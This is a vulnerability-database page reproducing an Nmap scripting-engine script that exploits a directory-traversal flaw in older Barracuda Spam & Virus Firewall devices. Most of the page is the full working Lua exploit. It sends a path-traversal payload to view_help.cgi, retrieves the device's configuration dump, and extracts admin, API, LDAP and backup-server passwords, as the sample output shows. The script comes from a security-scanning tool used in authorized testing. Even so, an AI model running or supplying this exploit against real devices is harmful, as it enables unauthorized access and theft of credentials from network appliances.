Lucene search

Brendan ColesNMAP:HTTP-BARRACUDA-DIR-TRAVERSAL.NSE

HistoryJun 28, 2011 - 11:43 p.m.

http-barracuda-dir-traversal NSE Script

2011-06-2823:43:34

Brendan Coles

nmap.org

165

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

10 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

0.973 High

EPSS

Percentile

99.8%

JSON

Attempts to retrieve the configuration settings from a Barracuda Networks Spam & Virus Firewall device using the directory traversal vulnerability described at <http://seclists.org/fulldisclosure/2010/Oct/119>.

This vulnerability is in the “locale” parameter of “/cgi-mod/view_help.cgi” or “/cgi-bin/view_help.cgi”, allowing the information to be retrieved from a MySQL database dump. The web administration interface runs on port 8000 by default.

Barracuda Networks Spam & Virus Firewall <= 4.1.1.021 Remote Configuration Retrieval Original exploit by ShadowHatesYou <[email protected]> For more information, see: <http://seclists.org/fulldisclosure/2010/Oct/119> <http://www.exploit-db.com/exploits/15130/>

Script Arguments

http-max-cache-size

Set max cache size. The default value is 100,000. Barracuda config files vary in size mostly due to the number of users. Using a max cache size of 5,000,000 bytes should be enough for config files containing up to 5,000 users.

slaxml.debug

See the documentation for the slaxml library.

http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent

See the documentation for the http library.

smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername

See the documentation for the smbauth library.

Example Usage

nmap --script http-barracuda-dir-traversal --script-args http-max-cache-size=5000000 -p &lt;port&gt; &lt;host&gt;

Script Output

PORT   STATE SERVICE   REASON
8000/tcp open  http    syn-ack Barracuda Spam firewall http config
| http-barracuda-dir-traversal:
| Users: 256
| Device: Barracuda Spam Firewall
| Version: 4.1.0.0
| Hostname: barracuda
| Domain: example.com
| Timezone: America/Chicago
| Language: en_US
| Password: 123456
| API Password: 123456
| MTA SASL LDAP Password: 123456
| Gateway: 192.168.1.1
| Primary DNS: 192.168.1.2
| Secondary DNS: 192.168.1.3
| DNS Cache: No
| Backup Server: ftp.example.com
| Backup Port: 21
| Backup Type: ftp
| Backup Username: user
| Backup Password: 123456
| NTP Enabled: Yes
| NTP Server: update01.barracudanetworks.com
| SSH Enabled: Yes
| BRTS Enabled: No
| BRTS Server: fp.bl.barracudanetworks.com
| HTTP Port: 8000
| HTTP Disabled: No
| HTTPS Port: 443
| HTTPS Only: No
|
| Vulnerable to directory traversal vulnerability:
|_http://seclists.org/fulldisclosure/2010/Oct/119

Requires

local http = require "http"
local shortport = require "shortport"
local stdnse = require "stdnse"
local string = require "string"
local table = require "table"

description = [[
Attempts to retrieve the configuration settings from a Barracuda
Networks Spam & Virus Firewall device using the directory traversal
vulnerability described at
http://seclists.org/fulldisclosure/2010/Oct/119.

This vulnerability is in the "locale" parameter of
"/cgi-mod/view_help.cgi" or "/cgi-bin/view_help.cgi", allowing the
information to be retrieved from a MySQL database dump.  The web
administration interface runs on port 8000 by default.

Barracuda Networks Spam & Virus Firewall <= 4.1.1.021 Remote Configuration Retrieval
Original exploit by ShadowHatesYou <[email protected]>
For more information, see:
http://seclists.org/fulldisclosure/2010/Oct/119
http://www.exploit-db.com/exploits/15130/
]]

---
-- @usage
-- nmap --script http-barracuda-dir-traversal --script-args http-max-cache-size=5000000 -p <port> <host>
--
-- @args http-max-cache-size
--       Set max cache size. The default value is 100,000.
--       Barracuda config files vary in size mostly due to the number
--       of users. Using a max cache size of 5,000,000 bytes should be
--       enough for config files containing up to 5,000 users.
--
-- @output
-- PORT   STATE SERVICE   REASON
-- 8000/tcp open  http    syn-ack Barracuda Spam firewall http config
-- | http-barracuda-dir-traversal:
-- | Users: 256
-- | Device: Barracuda Spam Firewall
-- | Version: 4.1.0.0
-- | Hostname: barracuda
-- | Domain: example.com
-- | Timezone: America/Chicago
-- | Language: en_US
-- | Password: 123456
-- | API Password: 123456
-- | MTA SASL LDAP Password: 123456
-- | Gateway: 192.168.1.1
-- | Primary DNS: 192.168.1.2
-- | Secondary DNS: 192.168.1.3
-- | DNS Cache: No
-- | Backup Server: ftp.example.com
-- | Backup Port: 21
-- | Backup Type: ftp
-- | Backup Username: user
-- | Backup Password: 123456
-- | NTP Enabled: Yes
-- | NTP Server: update01.barracudanetworks.com
-- | SSH Enabled: Yes
-- | BRTS Enabled: No
-- | BRTS Server: fp.bl.barracudanetworks.com
-- | HTTP Port: 8000
-- | HTTP Disabled: No
-- | HTTPS Port: 443
-- | HTTPS Only: No
-- |
-- | Vulnerable to directory traversal vulnerability:
-- |_http://seclists.org/fulldisclosure/2010/Oct/119
--
-- @changelog
-- 2011-06-08 - created by Brendan Coles - itsecuritysolutions.org
-- 2011-06-10 - added user count
--            - looped path detection
-- 2011-06-15 - looped system info extraction
--            - changed service portrule to "barracuda"
--

author = "Brendan Coles"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"intrusive", "exploit", "auth"}


portrule = shortport.port_or_service (8000, "barracuda", {"tcp"})

action = function(host, port)

  local result = {}
  local paths = {"/cgi-bin/view_help.cgi", "/cgi-mod/view_help.cgi"}
  local payload = "?locale=/../../../../../../../mail/snapshot/config.snapshot%00"
  local user_count = 0
  local config_file = ""

  -- Loop through vulnerable files
  stdnse.debug1("Connecting to %s:%s", host.targetname or host.ip, port.number)
  for _, path in ipairs(paths) do

    -- Retrieve file
    local data = http.get(host, port, tostring(path))
    if data and data.status then

      -- Check if file exists
      stdnse.debug1("HTTP %s: %s", data.status, tostring(path))
      if tostring(data.status):match("200") then

        -- Attempt config file retrieval with LFI exploit
        stdnse.debug1("Exploiting: %s", tostring(path .. payload))
        data = http.get(host, port, tostring(path .. payload))
        if data and data.status and tostring(data.status):match("200") and data.body and data.body ~= "" then

          -- Check if the HTTP response contains a valid config file in MySQL database dump format
          if string.match(data.body, "DROP TABLE IF EXISTS config;") and string.match(data.body, "barracuda%.css") then
            config_file = data.body
            break
          end

        else
          stdnse.debug1("Failed to retrieve file: %s", tostring(path .. payload))
        end

      end

    else
      stdnse.debug1("Failed to retrieve file: %s", tostring(path))
    end

  end

  -- No config file found
  if config_file == "" then
    stdnse.debug1("%s:%s is not vulnerable or connection timed out.", host.targetname or host.ip, port.number)
    return
  end

  -- Extract system info from config file in MySQL dump format
  stdnse.debug1("Exploit success! Extracting system info from MySQL database dump")

  -- Count users
  if string.match(config_file, "'user_default_email_address',") then
    for _ in string.gmatch(config_file, "'user_default_email_address',") do user_count = user_count + 1 end
  end
  table.insert(result, string.format("Users: %s", user_count))

  -- Extract system info
  local vars = {
    {"Device", "branding_device_name"},
    {"Version","httpd_last_release_notes_version_read"},
    {"Hostname","system_default_hostname"},
    {"Domain","system_default_domain"},
    {"Timezone","system_timezone"},
    {"Language","default_ndr_lang"},
    {"Password","system_password"},
    {"API Password","api_password"},
    {"MTA SASL LDAP Password","mta_sasl_ldap_advanced_password"},
    {"Gateway","system_gateway"},
    {"Primary DNS","system_primary_dns_server"},
    {"Secondary DNS","system_secondary_dns_server"},
    {"DNS Cache","dns_cache"},
    {"Backup Server","backup_server"},
    {"Backup Port","backup_port"},
    {"Backup Type","backup_type"},
    {"Backup Username","backup_username"},
    {"Backup Password","backup_password"},
    {"NTP Enabled","system_ntp"},
    {"NTP Server","system_ntp_server"},
    {"SSH Enabled","system_ssh_enable"},
    {"BRTS Enabled","brts_enable"},
    {"BRTS Server","brts_lookup_domain"},
    {"HTTP Port","http_port"},
    {"HTTP Disabled","http_shutoff"},
    {"HTTPS Port","https_port"},
    {"HTTPS Only","https_only"},
  }
  for _, var in ipairs(vars) do
    local var_match = string.match(config_file, string.format("'%s','([^']+)','global',", var[2]))
    if var_match then table.insert(result, string.format("%s: %s", var[1], var_match)) end
  end

  table.insert(result, "\nVulnerable to directory traversal vulnerability:\nhttp://seclists.org/fulldisclosure/2010/Oct/119")

  -- Return results
  return stdnse.format_output(true, result)

end

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

10 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

0.973 High

EPSS

Percentile

99.8%

JSON

Related for NMAP:HTTP-BARRACUDA-DIR-TRAVERSAL.NSE

nmap199